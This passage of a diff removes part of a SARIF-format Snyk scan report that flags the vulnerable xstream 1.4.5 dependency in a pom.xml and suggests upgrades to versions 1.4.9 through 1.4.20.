-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088329",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088330",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088331",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088332",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088333",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088334",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088335",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088336",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088337",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088338",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.16"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.16"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1294540",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.17"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.17"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569176",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569177",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569178",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569179",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569180",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569181",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569182",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569183",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569185",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569186",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569187",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569189",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569190",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569191",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.18"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.18"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-2388977",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.19"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.19"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-30385",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.9"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.9"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3091180",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.20"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.20"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-31394",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.10"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.10"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-3182897",
-          "level": "warning",
-          "message": {
